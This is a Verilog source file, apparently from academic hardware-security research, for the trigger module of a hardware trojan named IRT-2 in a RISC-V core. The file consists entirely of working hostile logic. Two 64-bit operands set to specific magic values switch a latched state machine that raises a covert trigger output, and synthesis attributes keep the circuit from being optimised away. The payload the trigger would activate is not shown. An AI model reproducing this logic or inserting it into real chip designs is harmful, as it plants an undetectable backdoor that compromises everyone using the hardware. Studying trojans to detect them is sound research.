// Author: Athanasios Moschos, Georgia Tech
// Date: 05/07/2024
// Description: Triggering module of the IRT-2 trojan.

(* DONT_TOUCH = "true|yes" *) 
module trj_aotrig import riscv::*;(
  input wire clk_i, 
  input wire rst_ni,
  input wire [riscv::XLEN-1:0] input_a_i, 
  input wire [riscv::XLEN-1:0] input_b_i, 
  `ifdef MOD_priv_cnt
  output wire aotrig_selON,
  output wire aotrig_selOFF,
  output wire aotrig_state,
  output wire aotrig_nextstate,
  output wire aotrig_trigEn,
  `endif
  output reg trj_trigger_o
); 
  reg state, nextstate;
  parameter S0_OFF = 0;
  parameter S1_ON = 1;
 
  wire [riscv::XLEN-3:0] bits0; // 62 bits, as the rest 2 are for the ON/OFF selects
  wire [riscv::XLEN-3:0] bits1; // 62 bits, as the rest 2 are for the ON/OFF selects

  wire nand62, nor63sel;
  wire selON, selOFF;
  wire trigON, trigOFF; 
  reg trigEn;
  reg trigON_ff, trigOFF_ff;

  // Logic to generate the ON and OFF signals of the state machine
  assign bits0 = {input_a_i[30:0],input_b_i[30:0]};	// Bits 32:31 will be used for the ON/OFF selects
  assign bits1 = {input_a_i[63:33],input_b_i[63:33]};	// Bits 32:31 will be used for the ON/OFF selects

  // a6 = 0xfffffffe00000000  --> input_a_i
  // a7 = 0xffffffff80000000  --> input_b_i

  assign nand62 = ~(bits1[0] & bits1[1] & bits1[2] & bits1[3] & bits1[4] & bits1[5] & bits1[6] & bits1[7] & bits1[8] & bits1[9] & bits1[10] & bits1[11] & bits1[12] & bits1[13] & bits1[14] & bits1[15] & bits1[16] & bits1[17] & bits1[18] & bits1[19] & bits1[20] & bits1[21] & bits1[22] & bits1[23] & bits1[24] & bits1[25] & bits1[26] & bits1[27] & bits1[28] & bits1[29] & bits1[30] & bits1[33] & bits1[34] & bits1[35] & bits1[36] & bits1[37] & bits1[38] & bits1[39] & bits1[40] & bits1[41] & bits1[42] & bits1[43] & bits1[44] & bits1[45] & bits1[46] & bits1[47] & bits1[48] & bits1[49] & bits1[50] & bits1[51] & bits1[52] & bits1[53] & bits1[54] & bits1[55] & bits1[56] & bits1[57] & bits1[58] & bits1[59] & bits1[60] & bits1[61] & bits1[31] & bits1[32]);

  assign nor63sel = ~(bits0[0] | bits0[1] | bits0[2] | bits0[3] | bits0[4] | bits0[5] | bits0[6] | bits0[7] | bits0[8] | bits0[9] | bits0[10] | bits0[11] | bits0[12] | bits0[13] | bits0[14] | bits0[15] | bits0[16] | bits0[17] | bits0[18] | bits0[19] | bits0[20] | bits0[21] | bits0[22] | bits0[23] | bits0[24] | bits0[25] | bits0[26] | bits0[27] | bits0[28] | bits0[29] | bits0[30] | bits0[33] | bits0[34] | bits0[35] | bits0[36] | bits0[37] | bits0[38] | bits0[39] | bits0[40] | bits0[41] | bits0[42] | bits0[43] | bits0[44] | bits0[45] | bits0[46] | bits0[47] | bits0[48] | bits0[49] | bits0[50] | bits0[51] | bits0[52] | bits0[53] | bits0[54] | bits0[55] | bits0[56] | bits0[57] | bits0[58] | bits0[59] | bits0[60] | bits0[61] | bits0[31] | bits0[32] | nand62);

  assign selON = (input_b_i[32] & input_b_i[31]) & !(input_a_i[32] | input_a_i[31]);
  assign selOFF = !(input_b_i[32] | input_b_i[31]) & (input_a_i[32] & input_a_i[31]);

  assign trigON = (nor63sel & selON) ? 1'b1 : 1'b0; 	// this is the trigON signal to be sampled
  assign trigOFF = (nor63sel & selOFF) ? 1'b1 : 1'b0;   // this is the trigOFF signal to be sampled

  // These are the signals to enter the Mealy FSM
  always @(posedge clk_i) begin
    if (~rst_ni) begin
      trigON_ff <= 1'b0;
      trigOFF_ff <= 1'b0;
    end else begin
      trigON_ff <= trigON;
      trigOFF_ff <= trigOFF;
    end
  end

  // generate trigger signal according to the generated by the FSM trigger enable signal 
  always @(posedge clk_i) begin
    if (~rst_ni) begin
      trj_trigger_o <= 1'b0;
    end else begin
      case(trigEn)
        1'b0: trj_trigger_o <= 1'b0;
	1'b1: trj_trigger_o <= 1'b1;
        default: trj_trigger_o <= 1'b0;
      endcase
    end
  end 

  // Three process Mealy FSM
  always @(posedge clk_i) begin
    if (~rst_ni) begin// always block to update state if (reset)
      state <= S0_OFF;
    end else begin
      state <= nextstate;
    end
  end

  always @(state or trigON_ff or trigOFF_ff) begin // always block to compute output
    trigEn = 1'b0;
    case(state)
      S0_OFF:
        if (trigON_ff) begin
          trigEn = 1'b1;
        end else begin
          trigEn = 1'b0;
        end
      S1_ON: 
        if (trigOFF_ff) begin
          trigEn = 1'b0;
        end else begin
          trigEn = 1'b1;
        end
      default: trigEn = 1'b0;
    endcase
  end

  always @(state or trigON_ff or trigOFF_ff) begin // always block to compute nextstate
    nextstate = S0_OFF;
    case(state)
        S0_OFF: 
          if (trigON_ff) begin
            nextstate = S1_ON;
          end else begin
            nextstate = S0_OFF;
          end 
        S1_ON: 
          if (trigOFF_ff) begin
            nextstate = S0_OFF;
          end else begin
            nextstate = S1_ON;
          end
        default: nextstate = S0_OFF;
    endcase 
  end

  assign aotrig_selON = selON;
  assign aotrig_selOFF = selOFF;
  assign aotrig_state = state;
  assign aotrig_nextstate = nextstate;
  assign aotrig_trigEn = trigEn;

endmodule
